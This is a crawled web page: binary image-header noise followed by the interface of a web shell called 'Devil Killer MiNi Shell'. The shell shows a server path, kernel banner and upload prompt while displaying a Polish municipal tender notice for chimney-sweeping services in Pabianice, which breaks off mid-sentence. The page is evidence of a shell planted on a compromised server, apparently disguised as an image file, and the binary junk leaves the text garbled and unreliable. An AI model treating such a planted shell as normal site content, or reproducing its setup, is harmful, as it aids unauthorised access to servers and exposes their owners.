JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20221222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20221222/0051224801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonywanie usług kominiarskich w roku 2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Mieszkaniowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 470013843</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warzywna 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pabianice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">422259285</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">422259286</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zgm@zgm.pabianice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgm.pabianice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonywanie usług kominiarskich w roku 2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8ac27fad-81cb-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00512248</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00084411/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi kominiarskie na 2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://zgm.pabianice.pl/glowna/przetargi/powyzej14 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://zgm.pabianice.pl/glowna/przetargi/powyzej14</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Na miniPortalu Zamawiający udostępnia następujące informacje: tryb, numer postępowania BZP, nr referencyjny, nazwę postępowania, dane zamawiającego, adres strony www zamawiającego oraz ogłoszenie, dokumenty postępowania. Ogłoszenia są publikowane w BZP, a SWZ wraz z załącznikami jest zamieszczane na stronie prowadzonego postępowania. <br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularza złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji.<br/>3.	W zakładce Formularz do złożenia, zmiany, wycofania oferty lub wniosku wykonawca składa ofertę, wprowadza do niej zmiany lub będzie mógł wycofać ofertę. Sposób przygotowania i złożenia oferty został podany w powyższym rozdziale.<br/>4.	W zakładce Formularze do komunikacji dostępny jest formularz, za wyłącznie którego pośrednictwem Zamawiający będzie się kontaktować z wykonawcami.<br/>5.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z mini Portalu dostępnym pod adresem https://miniportal.uzp.gov.pl/ WarunkiUslugi.aspx oraz Regulaminie ePUAP o ile nie są sprzeczne z niniejszym rozdziałem. Muszą być również zgodne z rozp. Prezesa RM z dnia 30.12.20 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniem Ministra RPiT z dnia 23.12.20 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>6.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy PZP podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP Zamawiającego przez miniPortal.<br/>1)	Link do postępowania na stronie internetowej Zamawiającego: http://zgm.pabianice.pl/glowna/przetargi/powyzej14 oraz ID postępowania w BZP: 2022/BZP 00084411/02/P , nr referencyjny postępowania nadany przez Zamawiającego: ZGM.NZP.2422.2.2022.MS. <br/>7.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną wyłącznie przy użyciu mini Portalu, dostępnego pod adresem: https://minipotal.uzp.gov.pl/ , ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal .<br/>8.	Jeżeli jakiekolwiek korespondencja od Wykonawcy, w szczególności dokumenty, powiadomienia, informacje zostaną wysłane do Zamawiającego drogą elektroniczną na jakikolwiek adres jego poczty elektronicznej (@zgm.pabianice.pl) lub w jakiejkolwiek innej formie, niż wskazane w ustępie poprzedzającym (np. osobiście, faxem, operatorem pocztowym, itp.) to korespondencja zostanie uzna za niedostarczoną i będzie ignorowana.<br/>9.	Jeżeli Zamawiający lub wykonawca otrzyma informację na pocztę elektroniczną, iż na koncie na miniPortalu na którym prowadzone będzie postępowanie zamieszczone zostały nowe pliki – taka informację należy traktować wyłącznie jako informację; żadne terminy od daty dostarczenia takiej informacji nie będą liczone.<br/>10.	Wszelka korespondencja przesłana za pomocą Formularza do korespondencji nie może być szyfrowana. We wszelkiej korespondencji należy posługiwać się numerem sprawy nadanym przez Zamawiającego.<br/>11.	Osoby do komunikowania się z wykonawcami:<br/>1)	Magdalena Skorupińska, (tylko w przypadku awarii miniPortalu) magdalena.skorupinska@zgm.pabianice.pl<br/>2)	Wanda Rutkowska-Hanc (tylko w przypadku awarii miniPortalu) wanda.rutkowska-hanc@zgm.pabianice.pl ,<br/>W przypadku awarii miniPortalu lub innych sytuacji awaryjnych Zamawiający ważne komunikaty będzie zamieszczać na stronie prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administrator danych osobowych - Zakład Gospodarki Mieszkaniowej w Pabianicach ul. Warzywna 6, 95 200 Pabianice mail: zgm@zgm.pabianice.pl tel. 42 225 92 85<br/>2.	Kontakt z IOD: e-mail iod@zgm.pabianice.pl lub numeru tel. 693 337 954<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO.<br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 22 lipca 2022 r. - Prawo zamówień publicznych, dalej „ustawa Pzp”<br/>5.	Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp.<br/>6.	Posiada Pani/Pan:<br/>6.1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>przy czym;<br/> na etapie trwającego postępowania:<br/>6.1.1.	w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu;<br/>po zakończeniu postępowania:<br/>6.1.2.	w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>6.2.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników):<br/>6.2.1.	skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może naruszać integralności protokołu oraz jego załączników;<br/>6.3.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków:<br/>6.3.1.	wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu;<br/>6.3.2. art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>6.4.	na podstawie art. 17 RODO prawo do usunięcia danych osobowych z zastrzeżeniem: <br/>6.4.1.	ust. 3 lit b RODO tj. konieczności wywiązania się z prawnego obowiązku wymagającego przetwarzania na mocy prawa Unii lub prawa państwa członkowskiego, któremu podlega administrator,<br/>6.4.2.	ust. 3 lit d RODO, gdyż dalsze przetwarzanie jest niezbędne do celów archiwalnych w interesie publicznym,<br/>6.4.3.	ust. 3 lit e RODO, gdyż dane osobowe mogą być niezbędne do ustalenia, dochodzenia lub obrony roszczeń;<br/>6.5.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Nie przysługuje Pani/Panu:<br/>6.6.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>6.7.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty postepowania o udzielenie zamówienia publicznego. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO , nie może skutkować zmianą wyniku postepowania o udzielenie zamówienia ani zamianą postanowień umowy w zakresie niezgodnym z ustawą. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenie 2016/679 nie ogranicza przetwarzania danych osobowych do czasu zakończenia postepowania o udzielenie zamówienia publicznego. W przypadku danych osobowych zamieszczonych przez Zamawiającego w BZP prawa, o których mowa w art.15 i art.16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGM.NZP.2422.2.2022.MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 584788,50 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> INFORMACJE PODZTAWOWE<br/>1.	Przedmiotem zamówienia jest wykonywanie usług kominiarskich, w zakres których wchodzą:<br/>a/	sprawdzenie stanu technicznego przewodów kominowych <br/>b/	czyszczenie przewodów kominowych <br/>c/	inne usługi kominiarskie, zwane dodatkowymi, które zostały określone w Opisie przedmiotu zamówienia, których wykonanie wynikać będzie z aktualnych potrzeb Zamawiającego.<br/>2.	Dokładne dane dotyczące przedmiotu zamówienia, tj. zakres robót związanych z realizacją zamówienia oraz zbiorcze dane dotyczące budynków, w których będą wykonywane usługi kominiarskie, zostały określone w załącznikach do SWZ, będącymi jednocześnie załącznikami do wzoru umowy. Szczegółowy opis przedmiotu zamówienia został zawarty w załączniku nr 2 do specyfikacji warunków zamówienia.<br/>3.	Część 1zamówienia dotyczy nieruchomości obsługiwanych przez Biuro Obsługi Mieszkańców (BOM) oraz nieruchomość przy ul. Warzywnej 6 i składowisko odpadów w Łaskowicach. <br/>4.	Zakres zamówienia <br/>a/	czyszczenie 3926 przewodów kominowych,<br/>b/	sprawdzenie stanu technicznej sprawności przewodów kominowych dla 2082 lokali (1913 lokale mieszkalne, 133 lokale użytkowe oraz 36 lokale gospodarcze) usytuowanych w 339 budynkach mieszkalnych lub usługowych na 235 nieruchomościach oraz w 117 budynkach gospodarczych <br/>c/	Ilości wykonania dodatkowych usług kominiarskich na każdej z części zamówienia wynikać będzie z aktualnych potrzeb Zamawiającego.<br/>INFORMACJE UZUPEŁNIAJĄCE<br/>1.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy stanowiącym część III SWZ. <br/>2.	Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę kluczowej części zamówienia, tj. sprawdzenia stanu technicznej sprawności przewodów kominowych.<br/>3.	Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę wszystkich osób, które będą bezpośrednio świadczyć pracę na wszystkich nieruchomościach objętych niniejszym zamówieniem; wymóg ten dotyczy osób świadczących pracę w zawodach takich jak kominiarze, czeladnicy kominiarscy, pomocnicy kominiarscy, pracownicy fizyczni/robotnicy niewykwalifikowani bezpośrednio świadczący pracę na nieruchomościach Zamawiającego itp. Sposób udokumentowania przez wykonawcę zatrudnienia tych osób na umowę o pracę, uprawnienia Zamawiającego w zakresie kontroli spełnienia wymagania tego wymogu, określenie kar umownych z tytułu wykonywania przez wykonawcę robót przez osoby niezatrudnione na umowę o pracę zostały określone we wzorze umowy stanowiącym część III SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 456030,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71632200-9 - Usługi badania nieinwazyjnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">90915000-4 - Usługi czyszczenia pieców i kominów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość powtórzenia przedmiotu zamówienia na okres kolejnych 3 miesięcy (wartość zamówienia - 25% wartości zamówienia podstawowego) . Zamawiający poinformuje pisemnie Wykonawcę, że skorzysta ze wznowienia w terminie do 31.12.2023 r. W przypadku niepoinformowania Wykonawcy w tym terminie, należy traktować, że Zamawiający nie będzie korzystał ze wznowienia. Wykonawca nie będzie miał żadnych roszczeń w stosunku do Zamawiającego, w przypadku gdy Zamawiający ze wznowienia nie skorzysta.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje badania oświadczeń stanowiących wstępne potwierdzenie, że na dzień składana ofert Wykonawca nie podlega wykluczeniu i spełnienia warunki udziału w postępowaniu. Następnie Zamawiający dokonuje oceny ofert, a następnie zbada, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. W takim przypadku, w terminie nie krótszym niż 5 dni wezwie Wykonawcę , który przedstawił najkorzystniejszą ofertę do złożenia dokumentów potwierdzających spełnienie warunków udziału oraz niepodleganie wykluczeniu z postępowania art, 274 ustawy stosuje się. 2 ) w toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. 3) Zamawiający dokona poprawek w ofercie zgodnie z zapisami art. 223 ust 2 ustawy PZP.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania dodatkowych usług kominiarskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> INFORMACJE PODSTAWOWE<br/>1.	Przedmiotem zamówienia jest wykonywanie usług kominiarskich, w zakres których wchodzą:<br/>d/	sprawdzenie stanu technicznego przewodów kominowych <br/>e/	czyszczenie przewodów kominowych <br/>f/	inne usługi kominiarskie, zwane dodatkowymi, które zostały określone w Opisie przedmiotu zamówienia, których wykonanie wynikać będzie z aktualnych potrzeb Zamawiającego.<br/>2.	Dokładne dane dotyczące przedmiotu zamówienia, tj. zakres robót związanych z realizacją zamówienia oraz zbiorcze dane dotyczące budynków, w których będą wykonywane usługi kominiarskie, zostały określone w załącznikach do SWZ, będącymi jednocześnie załącznikami do wzoru umowy. Szczegółowy opis przedmiotu zamówienia został zawarty w załączniku nr 2 do specyfikacji warunków zamówienia.<br/>3.	Część 2 zamówienia dotyczy nieruchomości obsługiwanych przez Biuro Obsługi Wspólnot Mieszkaniowych.<br/>4.	Zakres zamówienia <br/>a/	czyszczenie 987 przewodów kominowych,<br/>b/	sprawdzenie stanu technicznej sprawności przewodów kominowych dla 610 lokali (575 lokale mieszkalne, 28 lokale użytkowe oraz 7 lokale gospodarcze) usytuowanych w 80 budynkach mieszkalnych lub usługowych na 54 nieruchomościach oraz w 31 budynkach gospodarczych <br/>c/	Ilości wykonania dodatkowych usług kominiarskich na każdej z części zamówienia wynikać będzie z aktualnych potrzeb Zamawiającego.<br/>INFORMACJE UZUPEŁNIAJĄCE<br/>1.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy stanowiącym część III SWZ. <br/>2.	Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę kluczowej części zamówienia, tj. sprawdzenia stanu technicznej sprawności przewodów kominowych.<br/>3.	Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę wszystkich osób, które będą bezpośrednio świadczyć pracę na wszystkich 